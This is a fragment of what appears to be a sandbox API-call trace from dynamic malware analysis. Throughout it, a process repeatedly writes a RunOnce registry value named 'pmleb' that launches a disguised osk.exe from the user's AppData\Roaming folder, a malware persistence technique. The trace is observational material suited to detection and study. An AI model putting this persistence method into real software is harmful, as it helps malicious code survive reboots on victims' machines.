hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.718] RegCloseKey (hKey=0x280) returned 0x0 [0092.718] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.718] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.718] SetTimer (hWnd=0x20280, nIDEvent=0x220f, uElapse=0xa, lpTimerFunc=0x0) returned 0x220f [0092.718] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.732] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.732] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.732] KillTimer (hWnd=0x20280, uIDEvent=0x220f) returned 1 [0092.732] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.733] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.733] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.733] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.734] RegCloseKey (hKey=0x280) returned 0x0 [0092.734] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.734] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.734] SetTimer (hWnd=0x20280, nIDEvent=0x2210, uElapse=0xa, lpTimerFunc=0x0) returned 0x2210 [0092.734] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.747] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.748] 
DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.748] KillTimer (hWnd=0x20280, uIDEvent=0x2210) returned 1 [0092.748] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.749] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.749] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.749] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.749] RegCloseKey (hKey=0x280) returned 0x0 [0092.749] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.749] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.750] SetTimer (hWnd=0x20280, nIDEvent=0x2211, uElapse=0xa, lpTimerFunc=0x0) returned 0x2211 [0092.750] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.763] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.763] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.763] KillTimer (hWnd=0x20280, uIDEvent=0x2211) returned 1 [0092.764] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.764] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.764] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.765] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.765] RegCloseKey (hKey=0x280) returned 0x0 [0092.765] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.765] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.765] SetTimer (hWnd=0x20280, nIDEvent=0x2212, uElapse=0xa, lpTimerFunc=0x0) returned 0x2212 [0092.765] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.779] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.779] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.779] KillTimer (hWnd=0x20280, uIDEvent=0x2212) returned 1 [0092.779] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.780] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.780] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.780] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.780] RegCloseKey (hKey=0x280) returned 0x0 [0092.780] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.781] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.781] SetTimer (hWnd=0x20280, nIDEvent=0x2213, uElapse=0xa, lpTimerFunc=0x0) returned 0x2213 [0092.781] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.794] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.794] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.795] KillTimer (hWnd=0x20280, 
uIDEvent=0x2213) returned 1 [0092.795] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.795] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.796] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.796] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.796] RegCloseKey (hKey=0x280) returned 0x0 [0092.796] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.796] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.796] SetTimer (hWnd=0x20280, nIDEvent=0x2214, uElapse=0xa, lpTimerFunc=0x0) returned 0x2214 [0092.796] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.818] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.818] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.819] KillTimer (hWnd=0x20280, uIDEvent=0x2214) returned 1 [0092.820] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.820] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.820] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.820] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.820] RegCloseKey (hKey=0x280) returned 0x0 [0092.820] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.821] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.821] SetTimer (hWnd=0x20280, nIDEvent=0x2215, uElapse=0xa, lpTimerFunc=0x0) returned 0x2215 [0092.821] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.825] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.825] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.826] KillTimer (hWnd=0x20280, uIDEvent=0x2215) returned 1 [0092.826] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.826] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.826] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.827] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.827] RegCloseKey (hKey=0x280) returned 0x0 [0092.827] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.827] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.827] SetTimer (hWnd=0x20280, nIDEvent=0x2216, uElapse=0xa, lpTimerFunc=0x0) returned 0x2216 [0092.827] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.841] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.841] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.841] KillTimer (hWnd=0x20280, uIDEvent=0x2216) returned 1 [0092.842] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 
[0092.842] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.842] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.843] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.843] RegCloseKey (hKey=0x280) returned 0x0 [0092.843] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.843] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.843] SetTimer (hWnd=0x20280, nIDEvent=0x2217, uElapse=0xa, lpTimerFunc=0x0) returned 0x2217 [0092.843] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.857] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.857] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.857] KillTimer (hWnd=0x20280, uIDEvent=0x2217) returned 1 [0092.857] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.858] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.858] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.858] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.858] RegCloseKey (hKey=0x280) returned 0x0 
[0092.858] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.858] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.859] SetTimer (hWnd=0x20280, nIDEvent=0x2218, uElapse=0xa, lpTimerFunc=0x0) returned 0x2218 [0092.859] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.872] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.872] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.872] KillTimer (hWnd=0x20280, uIDEvent=0x2218) returned 1 [0092.873] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.873] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.873] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.874] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.874] RegCloseKey (hKey=0x280) returned 0x0 [0092.874] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.874] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.874] SetTimer (hWnd=0x20280, nIDEvent=0x2219, uElapse=0xa, lpTimerFunc=0x0) returned 0x2219 [0092.874] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.888] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.888] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.888] KillTimer (hWnd=0x20280, uIDEvent=0x2219) returned 1 [0092.888] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.889] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.889] 
RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.889] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.889] RegCloseKey (hKey=0x280) returned 0x0 [0092.889] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.890] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.890] SetTimer (hWnd=0x20280, nIDEvent=0x221a, uElapse=0xa, lpTimerFunc=0x0) returned 0x221a [0092.890] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.903] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.903] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.904] KillTimer (hWnd=0x20280, uIDEvent=0x221a) returned 1 [0092.904] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.904] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.904] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.905] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.905] RegCloseKey (hKey=0x280) returned 0x0 [0092.905] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.905] 
ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.905] SetTimer (hWnd=0x20280, nIDEvent=0x221b, uElapse=0xa, lpTimerFunc=0x0) returned 0x221b [0092.905] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.919] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.919] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.919] KillTimer (hWnd=0x20280, uIDEvent=0x221b) returned 1 [0092.920] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.920] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.920] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.920] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.921] RegCloseKey (hKey=0x280) returned 0x0 [0092.921] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.921] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.921] SetTimer (hWnd=0x20280, nIDEvent=0x221c, uElapse=0xa, lpTimerFunc=0x0) returned 0x221c [0092.921] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.935] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.935] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.935] KillTimer (hWnd=0x20280, uIDEvent=0x221c) returned 1 [0092.935] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.936] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.936] RegCreateKeyExA (in: hKey=0x80000001, 
lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.936] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.936] RegCloseKey (hKey=0x280) returned 0x0 [0092.936] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.936] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.936] SetTimer (hWnd=0x20280, nIDEvent=0x221d, uElapse=0xa, lpTimerFunc=0x0) returned 0x221d [0092.936] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.950] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.950] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.950] KillTimer (hWnd=0x20280, uIDEvent=0x221d) returned 1 [0092.951] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.951] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.951] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.951] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.952] RegCloseKey (hKey=0x280) returned 0x0 [0092.952] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.952] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 
[0092.952] SetTimer (hWnd=0x20280, nIDEvent=0x221e, uElapse=0xa, lpTimerFunc=0x0) returned 0x221e [0092.952] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.968] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.968] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.968] KillTimer (hWnd=0x20280, uIDEvent=0x221e) returned 1 [0092.969] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.969] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.969] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.969] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.970] RegCloseKey (hKey=0x280) returned 0x0 [0092.970] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.970] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.970] SetTimer (hWnd=0x20280, nIDEvent=0x221f, uElapse=0xa, lpTimerFunc=0x0) returned 0x221f [0092.970] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.981] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.981] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.982] KillTimer (hWnd=0x20280, uIDEvent=0x221f) returned 1 [0092.982] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.982] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.982] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, 
dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.983] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.983] RegCloseKey (hKey=0x280) returned 0x0 [0092.983] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.983] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.983] SetTimer (hWnd=0x20280, nIDEvent=0x2220, uElapse=0xa, lpTimerFunc=0x0) returned 0x2220 [0092.983] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.997] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.997] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.997] KillTimer (hWnd=0x20280, uIDEvent=0x2220) returned 1 [0092.997] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.998] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.998] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.998] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.998] RegCloseKey (hKey=0x280) returned 0x0 [0092.998] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.998] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.998] SetTimer (hWnd=0x20280, nIDEvent=0x2221, uElapse=0xa, lpTimerFunc=0x0) returned 0x2221 
